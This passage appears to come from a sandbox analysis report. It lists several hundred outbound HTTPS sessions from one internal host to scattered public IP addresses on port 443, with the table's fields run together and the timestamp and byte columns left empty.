                                        11725192.168.2.1336596166.35.149.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11726192.168.2.1355312120.126.93.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11727192.168.2.13509002.37.58.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11728192.168.2.1334070124.65.236.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11729192.168.2.1342006126.178.24.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11730192.168.2.1339606101.166.118.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11731192.168.2.1356638109.33.58.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11732192.168.2.1345622197.229.85.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11733192.168.2.1353904114.53.4.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11734192.168.2.134686284.52.206.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11735192.168.2.1335406165.51.255.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11736192.168.2.1341460176.92.159.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11737192.168.2.1360318196.59.26.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11738192.168.2.1351034159.59.65.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11739192.168.2.1351878153.42.213.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11740192.168.2.1335734119.18.74.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11741192.168.2.134932487.73.162.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11742192.168.2.1348804210.16.0.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11743192.168.2.134071649.166.91.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11744192.168.2.1350358143.7.36.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11745192.168.2.1358590155.147.55.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11746192.168.2.1335206209.206.57.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11747192.168.2.1342992210.170.239.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11748192.168.2.134928414.251.135.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11749192.168.2.133875049.230.165.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11750192.168.2.1341276216.30.38.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11751192.168.2.134050084.185.1.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11752192.168.2.1344006122.197.5.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11753192.168.2.13388581.178.222.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11754192.168.2.13363161.163.34.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11755192.168.2.135246287.53.47.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11756192.168.2.135661067.100.195.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11757192.168.2.1337298133.170.243.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11758192.168.2.1337326152.154.109.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11759192.168.2.13593581.182.155.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11760192.168.2.1357266174.10.150.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11761192.168.2.1357184196.127.145.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11762192.168.2.1358536202.127.22.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11763192.168.2.1346942145.240.55.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11764192.168.2.1338552177.30.100.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11765192.168.2.1345926216.7.162.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11766192.168.2.134988849.216.66.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11767192.168.2.133599283.25.255.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11768192.168.2.134366672.34.198.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11769192.168.2.1333498154.87.200.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11770192.168.2.135870297.96.103.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11771192.168.2.1349940105.132.140.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11772192.168.2.135204261.40.154.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11773192.168.2.1344636129.51.60.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11774192.168.2.1344866153.2.13.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11775192.168.2.134121073.55.252.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11776192.168.2.1355954103.129.117.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11777192.168.2.134598419.65.95.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11778192.168.2.1355836194.253.247.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11779192.168.2.134801886.237.61.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11780192.168.2.133788668.24.6.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11781192.168.2.1357234176.105.109.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11782192.168.2.13397562.101.20.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11783192.168.2.135633644.208.218.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11784192.168.2.1354526135.81.255.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11785192.168.2.134534473.190.95.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11786192.168.2.1347956187.126.223.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11787192.168.2.134989043.215.223.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11788192.168.2.133664462.182.163.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11789192.168.2.1360246103.27.90.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11790192.168.2.1337264111.87.179.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11791192.168.2.1355744194.246.121.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11792192.168.2.1342682203.135.193.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11793192.168.2.135265442.181.1.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11794192.168.2.1354946204.177.112.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11795192.168.2.134579661.250.64.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11796192.168.2.133520278.44.15.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11797192.168.2.1341568216.48.224.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11798192.168.2.1351116180.136.141.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11799192.168.2.133565654.28.97.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11800192.168.2.133311251.210.144.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11801192.168.2.134775020.78.67.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11802192.168.2.1359352184.55.7.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11803192.168.2.1337334135.199.128.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11804192.168.2.1359884115.216.103.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11805192.168.2.1341784140.203.48.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11806192.168.2.1356472102.164.53.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11807192.168.2.134012889.215.231.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11808192.168.2.1358846138.60.245.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11809192.168.2.1345210158.120.146.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11810192.168.2.133579844.232.107.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11811192.168.2.134868895.170.15.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11812192.168.2.135025695.103.168.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11813192.168.2.1339816185.190.133.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11814192.168.2.1340768221.157.3.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11815192.168.2.1340564206.219.65.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11816192.168.2.1358014146.235.6.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11817192.168.2.135640281.44.158.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11818192.168.2.1337504203.107.71.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11819192.168.2.1354236149.107.124.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11820192.168.2.1351920105.228.166.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11821192.168.2.1360968212.223.167.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11822192.168.2.1334966169.84.9.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11823192.168.2.133958620.23.187.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11824192.168.2.1338606171.222.71.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11825192.168.2.1357914102.178.4.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11826192.168.2.1348418110.188.122.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11827192.168.2.134612635.94.157.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11828192.168.2.1341810100.193.205.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11829192.168.2.134069683.75.151.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11830192.168.2.1338384204.37.152.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11831192.168.2.1350262162.213.176.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11832192.168.2.134416240.209.80.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11833192.168.2.134134819.56.174.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11834192.168.2.135896869.221.96.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11835192.168.2.1336256166.186.107.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11836192.168.2.1351518195.222.140.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11837192.168.2.1355092200.127.24.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11838192.168.2.1352082141.189.144.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11839192.168.2.135418857.121.247.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11840192.168.2.1343020220.11.70.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11841192.168.2.133581859.234.153.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11842192.168.2.134071820.77.120.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11843192.168.2.135122084.102.103.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11844192.168.2.134842812.63.168.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11845192.168.2.1338622150.229.96.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11846192.168.2.134907845.15.58.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11847192.168.2.133722614.222.193.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11848192.168.2.1336116176.82.130.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11849192.168.2.1356706101.110.224.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11850192.168.2.133305269.241.19.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11851192.168.2.1341008114.82.173.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11852192.168.2.135201427.197.157.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11853192.168.2.1360140104.200.28.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11854192.168.2.1360358112.122.216.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11855192.168.2.1340680135.176.13.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11856192.168.2.1353280134.221.249.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11857192.168.2.1347782125.145.232.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11858192.168.2.1336348170.192.154.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11859192.168.2.133857885.223.175.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11860192.168.2.1350464199.19.243.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11861192.168.2.134395072.64.22.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11862192.168.2.1346500194.164.27.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11863192.168.2.1348892148.216.210.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11864192.168.2.135398261.0.157.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11865192.168.2.133421025.244.120.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11866192.168.2.1356768212.41.59.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11867192.168.2.1345220152.175.48.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11868192.168.2.133478284.52.37.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11869192.168.2.134500480.53.120.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11870192.168.2.1333270221.243.8.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11871192.168.2.1333286195.38.227.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11872192.168.2.133404451.121.13.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11873192.168.2.134007688.126.37.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11874192.168.2.133736050.235.17.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11875192.168.2.1341212217.107.85.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11876192.168.2.13417161.103.73.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11877192.168.2.1350538129.65.126.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11878192.168.2.1355804146.133.32.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11879192.168.2.1339992163.118.131.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11880192.168.2.1344432207.31.250.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11881192.168.2.134509813.4.145.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11882192.168.2.133689696.233.159.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11883192.168.2.133527481.50.225.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11884192.168.2.135661687.81.125.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11885192.168.2.1344852129.255.48.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11886192.168.2.1339642118.143.179.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11887192.168.2.135293649.199.108.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11888192.168.2.1336510118.145.162.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11889192.168.2.135247448.124.197.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11890192.168.2.1360666170.66.9.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11891192.168.2.134555857.4.209.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11892192.168.2.133481469.209.236.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11893192.168.2.1360070202.57.87.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11894192.168.2.133293473.103.121.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11895192.168.2.1353796119.48.176.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11896192.168.2.13448484.161.88.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11897192.168.2.1354030124.126.157.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11898192.168.2.135201218.244.178.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11899192.168.2.1335988178.205.236.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11900192.168.2.1357066144.137.18.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11901192.168.2.135721692.57.169.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11902192.168.2.133385663.129.146.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11903192.168.2.1352118202.189.164.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11904192.168.2.1355072141.53.145.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11905192.168.2.1356478205.201.185.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11906192.168.2.1350946221.95.14.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11907192.168.2.135628627.115.187.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11908192.168.2.1333170134.246.108.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11909192.168.2.135823084.10.165.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11910192.168.2.1338454138.149.111.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11911192.168.2.1343862205.131.75.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11912192.168.2.135883470.107.113.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11913192.168.2.1338814184.193.60.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11914192.168.2.1356322203.29.207.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11915192.168.2.134818651.20.186.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11916192.168.2.134504050.211.196.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11917192.168.2.1357528212.181.68.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11918192.168.2.1343702145.2.44.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11919192.168.2.1356486178.223.207.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11920192.168.2.1349376133.130.158.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11921192.168.2.134237678.108.228.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11922192.168.2.134418063.191.190.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11923192.168.2.1346908213.166.31.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11924192.168.2.1354148204.0.163.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11925192.168.2.1348378194.134.26.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11926192.168.2.133512676.1.7.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11927192.168.2.1339006141.88.90.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11928192.168.2.1344700180.206.56.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11929192.168.2.1333356190.232.18.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11930192.168.2.1358716147.128.72.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11931192.168.2.1335334188.38.225.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11932192.168.2.134488089.233.34.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11933192.168.2.1351374140.171.231.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11934192.168.2.1350438212.207.66.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11935192.168.2.1347670181.36.151.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11936192.168.2.1344962147.204.114.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11937192.168.2.1344000107.93.165.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11938192.168.2.134898463.178.175.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11939192.168.2.1355534116.1.149.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11940192.168.2.13600509.232.43.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11941192.168.2.134237850.97.228.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11942192.168.2.1354530164.48.233.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11943192.168.2.1333800213.249.189.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11944192.168.2.1356476197.196.207.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11945192.168.2.1346596191.22.93.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11946192.168.2.1353310213.33.126.182443
                                        TimestampBytes transferredDirectionData


